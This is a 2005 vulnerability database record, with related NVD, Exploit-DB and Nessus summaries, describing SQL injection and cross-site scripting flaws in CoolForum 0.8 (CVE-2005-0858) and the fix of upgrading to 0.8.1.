ID: OSVDB:14953
Type: osvdb
Reporter: Romano (romano_45@hotmail.com)
Modified: 2005-03-17T19:47:52
Description
Vulnerability Description
CoolForum contains a flaw that may allow a remote attacker to inject arbitrary SQL queries. The issue is due to the 'login' parameter in the 'register.php' script not being properly sanitized, which may allow a remote attacker to inject or manipulate SQL queries.
Solution Description
Upgrade to version 0.8.1 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.
Short Description
CoolForum contains a flaw that may allow a remote attacker to inject arbitrary SQL queries. The issue is due to the 'login' parameter in the 'register.php' script not being properly sanitized, which may allow a remote attacker to inject or manipulate SQL queries.
Record Details
Title: CoolForum register.php login Parameter SQL Injection
Published: 2005-03-17T19:47:52
Bulletin family: software
CVSS: 7.5 (AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/)
Affected software: CoolForum 0.8
CVE: CVE-2005-0858
Record URL: https://vulners.com/osvdb/OSVDB:14953

References
Vendor URL: http://www.coolforum.net/
Security Tracker: 1013474
Related OSVDB ID: 14951 (https://vulners.com/osvdb/OSVDB:14951)
Related OSVDB ID: 14952 (https://vulners.com/osvdb/OSVDB:14952)
ISS X-Force ID: 19759
CVE-2005-0858 (https://vulners.com/cve/CVE-2005-0858)
Bugtraq ID: 12852
Related Bulletins

CVE-2005-0858 (NVD, published 2005-05-02, modified 2017-07-11)
Multiple SQL injection vulnerabilities in CoolForum 0.8 and earlier allow remote attackers to execute arbitrary SQL commands via (1) the pseudo parameter to entete.php or (2) the login parameter to register.php.
CVSS 2.0: 7.5 HIGH (AV:N/AC:L/Au:N/C:P/I:P/A:P); exploitability 10.0, impact 6.4; no authentication or user interaction required
CPE: cpe:/a:coolforum:coolforum:0.8
https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-0858

OSVDB:14952 CoolForum entete.php pseudo Parameter SQL Injection (published 2005-03-17T19:47:52)
CoolForum contains a flaw that may allow a remote attacker to inject arbitrary SQL queries. The issue is due to the 'pseudo' parameter in the 'entete.php' script not being properly sanitized, which may allow a remote attacker to inject or manipulate SQL queries. Upgrade to version 0.8.1 or higher, as it has been reported to fix this vulnerability; an upgrade is required as there are no known workarounds.
CVSS: 7.5 (AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/)
References: Vendor URL http://www.coolforum.net/; Security Tracker 1013474; Related OSVDB IDs 14953 and 14951; ISS X-Force ID 19759; CVE-2005-0858; Bugtraq ID 12852
https://vulners.com/osvdb/OSVDB:14952

EDB-ID:25240 CoolForum 0.5/0.7/0.8 register.php login Parameter SQL Injection (Exploit-DB, published 2005-03-19, webapps exploit for the PHP platform)
Source: http://www.securityfocus.com/bid/12852/info
Multiple remote input validation vulnerabilities affect CoolForum. These issues are due to a failure of the application to properly sanitize user-supplied input prior to using it to carry out critical functionality. Multiple SQL injection vulnerabilities have been reported and a cross-site scripting vulnerability is also reported. An attacker may leverage these issues to manipulate and view arbitrary database contents by exploiting the SQL injection issues, and to have arbitrary script code executed in the browser of an unsuspecting user by exploiting the cross-site scripting vulnerabilities.
CVSS: 7.5 (AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/)
https://www.exploit-db.com/exploits/25240/

Nessus plugin 17597, COOLFORUM_XSS_SQL.NASL: CoolForum Multiple Vulnerabilities (SQLi, XSS) (published 2005-03-22, plugin modified 2021-01-19; CVE-2005-0857, CVE-2005-0858; Bugtraq ID 12852)
Synopsis: The remote web server contains a PHP application that suffers from multiple issues.
Description: The remote host is running a version of CoolForum that suffers from multiple input validation vulnerabilities.
 - Multiple SQL Injection Vulnerabilities: Due to a failure to properly sanitize user input supplied through the 'pseudo' parameter of the 'admin/entete.php' script and the 'ilogin' parameter of the 'register.php' script, an attacker may be able to manipulate SQL queries and view arbitrary database contents provided PHP's 'magic_quotes_gpc' setting is disabled.
 - A Cross-Site Scripting Vulnerability: It is possible to inject arbitrary script and HTML code into the 'img' parameter of the 'avatar.php' script. An attacker can exploit these flaws to cause code to run on a user's browser within the context of the remote site, enabling him to steal authentication cookies, access data recently submitted by the user, and the like.
Solution: Upgrade to CoolForum version 0.8.1 or later.
See also: http://securitytracker.com/alerts/2005/Mar/1013474.html
Plugin notes: the check fingerprints CoolForum by the "Powered by ... CoolForum" string on index.php; the SQL injection checks require PHP's magic_quotes to be off; the register.php check applies only to CoolForum 0.8 and requires CoolForum's confirmation-by-mail option to be enabled (it is by default); the XSS check requires PHP's display_errors to be enabled.
CVSS: 5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P); temporal vector E:H/RL:U/RC:ND; exploit available
https://www.tenable.com/plugins/nessus/17597